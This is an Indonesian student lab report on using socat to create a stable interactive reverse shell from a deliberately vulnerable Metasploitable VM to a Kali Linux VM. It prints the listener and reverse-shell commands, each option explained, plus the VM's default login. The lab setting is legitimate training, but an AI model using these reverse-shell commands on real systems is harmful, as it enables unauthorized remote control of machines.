• Tidak ada hasil yang ditemukan

LAB 70 PRATIKUM KEAMANAN INFRASTRUKTUR JARINGAN KOMPUTER

N/A
N/A
mutia mutiah

Academic year: 2024

Membagikan "LAB 70 PRATIKUM KEAMANAN INFRASTRUKTUR JARINGAN KOMPUTER "

Copied!
5
0
0

Teks penuh

(1)

PRATIKUM KEAMANAN INFRASTRUKTUR JARINGAN KOMPUTER

“Lab 70. Membuat Stable Socat Kerang”

DOSEN PENGAMPU:

HADI KURNIA SAPUTRA, S.Pd, M.Kom

OLEH:

Nama :Mutiah Lubis NIM : 20076011

PROGRAM STUDI PENDIDIKAN TEKNIK INFORMATIKA DEPARTEMEN TEKNIK ELEKTRONIKA

FAKULTAS TEKNIK

UNIVERSITAS NEGERI PADANG

2023

(2)

Lab 70. Membuat Stable Socat Kerang

Identity

Nama : Mutiah Lubis NIM :20076011

Tujuan Lab:

Pelajari cara menstabilkan cangkang dengan socat.

Tujuan Lab:

Socat adalah utilitas berbasis baris perintah yang membentuk dua byte dua arah mengalirkan dan mentransfer data di antara mereka. Socat dapat digunakan untuk banyak orang tujuan yang berbeda karena keserbagunaannya.

Alat Lab:

Kali Linux dan Metasploitable VM.

Topologi Lab:

Anda dapat menggunakan Kali Linux di VM untuk lab ini.

Panduan Lab:

Tugas 1:

Di lab ini, kita akan menggunakan socat untuk membuat shell balik yang stabil pada mesin yang dapat dieksploitasi. Jika Anda tidak terbiasa dengan metasploitable, itu adalah mesin yang sengaja rentan yang dapat dimuat di VMware, sama sebagai Kali Linux. Anda dapat mengunduh file iso metasploitable di sini: https://docs.rapid7.com/metasploit/metasploitable-2/

Anda dapat menemukan banyak materi di halaman ini tentang cara mengunduh dan mengaturnya VM yang dapat dieksploitasi.

(3)

Kami akan menggunakan Kali Linux dan Metasploitable untuk lab ini. Ingatlah untuk letakkan kedua mesin di jaringan khusus host terisolasi yang sama untuk berbicara satu sama lain-lainnya.

Saat login diperlukan, Anda akan memasukkan "msfadmin" sebagai nama pengguna dan kata sandi.

Tugas 2:

Socat sudah diinstal sebelumnya di Kali Linux. Perbedaan utama antara netcat dan socat adalah sintaks untuk menggunakan socat lebih sulit dipahami. Socat digunakan untuk membuat hubungan antara dua titik. Poin-poin ini bisa apa pun. Kita akan mulai dengan membuat bind shell yang menghubungkan Kali VM kita VM Metasploitable kami.

Pertama, mari cari tahu alamat IP eth0 dari VM Metasploitable kami dan tuliskan turun. Kami akan menggunakan informasi ini di Kali VM kami. Buka layar terminal di Metasploitable VM dan ketik perintah ini:

Ifconfig

(4)

192.168.56.103 adalah alamat IP Kali VM kami dalam hal ini.

Kemudian, buat pendengar baru di Kali VM kami dengan mengetikkan yang berikut:

socat TCP-L:8080 FILE:`tty`,raw,echo=0

Perintah ini akan membentuk pendengar pada port yang kita tentukan. Itu juga akan alokasikan tty baru dan setel gema ke nol dari awal, artinya kita tidak punya untuk menentukan ini nanti seperti yang kita lakukan dengan netcat (dengan menekan CTRL+Z lalu mengetik “sty raw - echo; fg”).

Tugas 3:

Pendengar socat normal dapat dihubungkan dengan muatan apa pun, tetapi ini baru pendengar tidak bisa. Kita perlu menggunakan perintah socat khusus untuk melakukannyaterhubung ke pendengar ini. Agar ini berfungsi, target kita harus menginstal socat.

Kami sekarang akan beralih ke VM Metasploitable kami. Perintah khusus kita akan mengetik ke terminal di VM Metasploitable kami seperti mengikuti:

socat TCP:192.168.56.103:8080 EXEC:”bash -li”,pty,stderr,sigint,setsid,sane

Jangan hancurkan perintah ini di atas menggunakan enter saat mengetik di terminal layar!

Bagian pertama akan menghubungkan Metasploitable VM kembali ke Kali VM kita pelabuhan yang ditentukan.

 EXEC:”bash -li” membuat bash shell interaktif untuk kita gunakan

 pty mengalokasikan pseudoterminal pada target, yang diperlukansebagai bagian dari proses stabilisasi

 stderr memastikan setiap pesan kesalahan yang mungkin kami temui dapatkanditampilkan di shell, yang tidak terjadi dengan non-interaktifkerang

 sigint – Jika kita menekan ctrl + c saat berada di shell, sekarang akan diteruskan

 untuk setiap proses yang kami jalankan di shell, yang memungkinkan kami untuk melakukannyabunuh proses dan perintah di shell

 setsid akan membuat proses di sesi baru

 sane akan menstabilkan terminal dan mencoba menormalkannya

(5)

Jika kami kembali ke terminal Kali kami dan mencoba menjalankan perintah seperti "id" dan

"whoami", kita dapat melihat bahwa kita telah berhasil membuat sebuah shell mesin metasploitable kami.

Ini adalah shell terbalik yang sepenuhnya stabil dan juga interaktif, seperti yang Anda lihatproses interaktif seperti SSH akan bekerja. Anda juga akan melihat bahwa ctrl + c tidak akan mematikan shell. Anda juga akan melihat msfadmin@metasploitable:~$ menunjukkan bahwa kami memiliki shell berfitur lengkap pada target.

Socat dapat membuat cangkang yang lebih stabil pada target dengan sedikit usaha. Utama masalah dengan menggunakan alat ini adalah memastikan bahwa target telah memasang alat tersebut.

Referensi

Dokumen terkait